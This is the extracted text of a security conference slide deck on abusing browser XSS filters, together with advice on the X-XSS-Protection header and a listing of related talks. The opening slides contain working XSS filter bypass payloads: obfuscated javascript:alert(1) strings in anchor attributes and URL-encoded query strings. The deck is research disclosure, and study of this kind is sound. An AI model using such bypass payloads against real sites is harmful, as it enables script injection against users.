+style="behavior:url%26bx28%3B%23default%23
AnchorClick)"s:>Click&v%0Ab%0As%0A:&v%0A%0
Ab%0A%0A%0A%0A%0As:
<a folder="jav&bx41;script:alert(1)"
style="behavior:url&bx28;#default#AnchorClic
k)"s:>Click
Before cut-off
Bypass 2: <a folder>
URL:
?q=<a+folder="jav%26bx41%3Bscript:alert(1)"
+style="behavior:url%26bx28%3B%23default%23
AnchorClick)"s:>Click&v%0Ab%0As%0A:&v%0A%0
Ab%0A%0A%0A%0A%0As:
<a folder="jav&#x41;script:alert(1)"
style="behavior:url&#x28;#default#AnchorClic
k)"s:>Click
When the link which the filter created is clicked..
After cut-off
Bypass 2: <a folder>
URL:
?q=<a+folder="jav%26bx41%3Bscript:alert(1)"
+style="behavior:url%26bx28%3B%23default%23
AnchorClick)"s:>Click&v%0Ab%0As%0A:&v%0A%0
Ab%0A%0A%0A%0A%0As:
<a folder="jav&#x41;script:alert(1)"
style="behavior:url&#x28;#default#AnchorClic
k)"s:>Click
After cut-off
Bypass 2: <a folder>
http://l0.cm/xxn/
The test page of all
methods.
It includes methods
which I didn't introduce.
Overcome the
Nightmare
X-XSS-Protection
Value Effect
0 Disable
1 Enable
(Partial rewrite)
1;mode=block Enable
(Prevent rendering of the page)
Default
It can control function of XSS protection.
Default is partial rewrite
It rewrites only problem part.
It seems to be good for developers.
That,
➡ How should site administrator do?
It produce possibility of attack which I introduced.
How are
careful persons doing?
HTTP/2.0 200 OK
Date: Mon, 19 Oct 2015 22:32:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
...
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 19 Oct 2015 22:40:37 GMT
x-content-type-options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
...
The choice which
considered more safety
Value Sites which should choose header
0
They are measuring basic XSS.
/They want to remove false-negative.
1
Not recommended
(Discovered technique affects here.)
1;mode
=block
It is probable that the site have XSS.
/They want to protect site just in case.
Default
X-XSS-Protection:0 or 1;mode=block
Is mode=block safe?
It should don't affect direct script execution.
I think a favor of the filter is bigger than it.
If feature of cut-off can detect from outside,
they may guess page contents.
This possibility probably can't be changes
to zero.
On the other hand…
Do you want to use
no X-XSS-Protection?
Then, you should do as follows:
If you can do those,
From the first, you don't create normal XSS!
✔ you should completely grasp XSS filter's cut-
off action.
✔ If the part of the page is rewritten, you should
inspect all page for normal operation and safety.
✔ If the page includes dangerous part, you
should rewrite the code one by one for
avoidance.
In fact
In some case, it is possible to
not operate specific function
from intentional false positive.
(…)
Did the author of XSS filter
introduce XSS filter while
recognizing about the risks?
(or not) I’m interested a little
about it.
Mr. Terada's blog
http://d.hatena.ne.jp/teracc/2
0090622
Browser side introduced it, knowing the risk.
Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:
In fact
http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke
Insider said
"The answer is Yes. ".
Mr. Hasegawa
Browser side introduced it, knowing the risk.
Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:
➡ When you become careful, you should add
the header. This is an old story!
Conclusions
I'm hoping for improvement of XSS filter.
It should still be possible to do safely.
Is present default action really OK?
In theory, cut-off risk is inseparable from
XSS filter.
I want web developer to know this possibility.
I highly recommend XSS protection control
except default action.
";alert#"Thanks!"#//
@kinugawamasato
masatokinugawa@gmail#com
http://l0.cm/xxn/DEMO

More Related Content

What's hot

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
Yaroslav Babin
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
Mikhail Egorov
 

What's hot (20)

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 

Similar to X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter

Asp
AspAsp
Even faster web sites presentation 3
Even faster web sites presentation 3Even faster web sites presentation 3
Even faster web sites presentation 3
Felipe Lavín
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b55
 
Cool bonsai cool - an introduction to ElasticSearch
Cool bonsai cool - an introduction to ElasticSearchCool bonsai cool - an introduction to ElasticSearch
Cool bonsai cool - an introduction to ElasticSearch
clintongormley
 
HTML Web Devlopment presentation css.ppt
HTML Web Devlopment presentation css.pptHTML Web Devlopment presentation css.ppt
HTML Web Devlopment presentation css.ppt
raghavanp4
 
css.ppt
css.pptcss.ppt
css.ppt
css.pptcss.ppt
css.ppt
Sana903754
 
Zero One Or Many Namespaces
Zero One Or Many NamespacesZero One Or Many Namespaces
Zero One Or Many Namespaces
LiquidHub
 
Java script
Java scriptJava script
Java script
Sanjay Gunjal
 
XSLT for Web Developers
XSLT for Web DevelopersXSLT for Web Developers
XSLT for Web Developers
Sanders Kleinfeld
 
Makanan halal-haram-2970785
Makanan halal-haram-2970785Makanan halal-haram-2970785
Makanan halal-haram-2970785
khairulamar
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
 
Xhtml Basics
Xhtml BasicsXhtml Basics
Xhtml Basics
AkramWaseem
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
tutorialsruby
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
tutorialsruby
 
Xhtml Basics
Xhtml BasicsXhtml Basics
Xhtml Basics
AkramWaseem
 
A bug bounty tale: Chrome, stylesheets, cookies, and AES
A bug bounty tale: Chrome, stylesheets, cookies, and AESA bug bounty tale: Chrome, stylesheets, cookies, and AES
A bug bounty tale: Chrome, stylesheets, cookies, and AES
cgvwzq
 
Sql exception and class notfoundexception
Sql exception and class notfoundexceptionSql exception and class notfoundexception
Sql exception and class notfoundexception
Rohit Singh
 
2001: Bridging the Gap between RSS and Java Old School Style
2001: Bridging the Gap between RSS and Java Old School Style2001: Bridging the Gap between RSS and Java Old School Style
2001: Bridging the Gap between RSS and Java Old School Style
Russell Castagnaro
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
johnwilander
 

Similar to X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter (20)

Asp
AspAsp
Asp
 
Even faster web sites presentation 3
Even faster web sites presentation 3Even faster web sites presentation 3
Even faster web sites presentation 3
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
Cool bonsai cool - an introduction to ElasticSearch
Cool bonsai cool - an introduction to ElasticSearchCool bonsai cool - an introduction to ElasticSearch
Cool bonsai cool - an introduction to ElasticSearch
 
HTML Web Devlopment presentation css.ppt
HTML Web Devlopment presentation css.pptHTML Web Devlopment presentation css.ppt
HTML Web Devlopment presentation css.ppt
 
css.ppt
css.pptcss.ppt
css.ppt
 
css.ppt
css.pptcss.ppt
css.ppt
 
Zero One Or Many Namespaces
Zero One Or Many NamespacesZero One Or Many Namespaces
Zero One Or Many Namespaces
 
Java script
Java scriptJava script
Java script
 
XSLT for Web Developers
XSLT for Web DevelopersXSLT for Web Developers
XSLT for Web Developers
 
Makanan halal-haram-2970785
Makanan halal-haram-2970785Makanan halal-haram-2970785
Makanan halal-haram-2970785
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Xhtml Basics
Xhtml BasicsXhtml Basics
Xhtml Basics
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
 
xhtml_basics
xhtml_basicsxhtml_basics
xhtml_basics
 
Xhtml Basics
Xhtml BasicsXhtml Basics
Xhtml Basics
 
A bug bounty tale: Chrome, stylesheets, cookies, and AES
A bug bounty tale: Chrome, stylesheets, cookies, and AESA bug bounty tale: Chrome, stylesheets, cookies, and AES
A bug bounty tale: Chrome, stylesheets, cookies, and AES
 
Sql exception and class notfoundexception
Sql exception and class notfoundexceptionSql exception and class notfoundexception
Sql exception and class notfoundexception
 
2001: Bridging the Gap between RSS and Java Old School Style
2001: Bridging the Gap between RSS and Java Old School Style2001: Bridging the Gap between RSS and Java Old School Style
2001: Bridging the Gap between RSS and Java Old School Style
 
Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 

More from Masato Kinugawa

X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
Masato Kinugawa
 
Bug-hunter's Sorrow
Bug-hunter's SorrowBug-hunter's Sorrow
Bug-hunter's Sorrow
Masato Kinugawa
 
バグハンターの哀しみ
バグハンターの哀しみバグハンターの哀しみ
バグハンターの哀しみ
Masato Kinugawa
 
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
Masato Kinugawa
 
SecurityCamp2015「CVE-2015-4483解説」
SecurityCamp2015「CVE-2015-4483解説」SecurityCamp2015「CVE-2015-4483解説」
SecurityCamp2015「CVE-2015-4483解説」
Masato Kinugawa
 
いでよ、電卓!
いでよ、電卓!いでよ、電卓!
いでよ、電卓!
Masato Kinugawa
 
見つけた脆弱性について(cybozu.com Security Challenge)
見つけた脆弱性について(cybozu.com Security Challenge)見つけた脆弱性について(cybozu.com Security Challenge)
見つけた脆弱性について(cybozu.com Security Challenge)Masato Kinugawa
 

More from Masato Kinugawa (7)

X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
X-XSS-Nightmare: 1; mode=attack ~XSSフィルターを利用したXSS攻撃~
 
Bug-hunter's Sorrow
Bug-hunter's SorrowBug-hunter's Sorrow
Bug-hunter's Sorrow
 
バグハンターの哀しみ
バグハンターの哀しみバグハンターの哀しみ
バグハンターの哀しみ
 
SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」SecurityCamp2015「バグハンティング入門」
SecurityCamp2015「バグハンティング入門」
 
SecurityCamp2015「CVE-2015-4483解説」
SecurityCamp2015「CVE-2015-4483解説」SecurityCamp2015「CVE-2015-4483解説」
SecurityCamp2015「CVE-2015-4483解説」
 
いでよ、電卓!
いでよ、電卓!いでよ、電卓!
いでよ、電卓!
 
見つけた脆弱性について(cybozu.com Security Challenge)
見つけた脆弱性について(cybozu.com Security Challenge)見つけた脆弱性について(cybozu.com Security Challenge)
見つけた脆弱性について(cybozu.com Security Challenge)
 

Recently uploaded

How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 

Recently uploaded (20)

How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 

X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter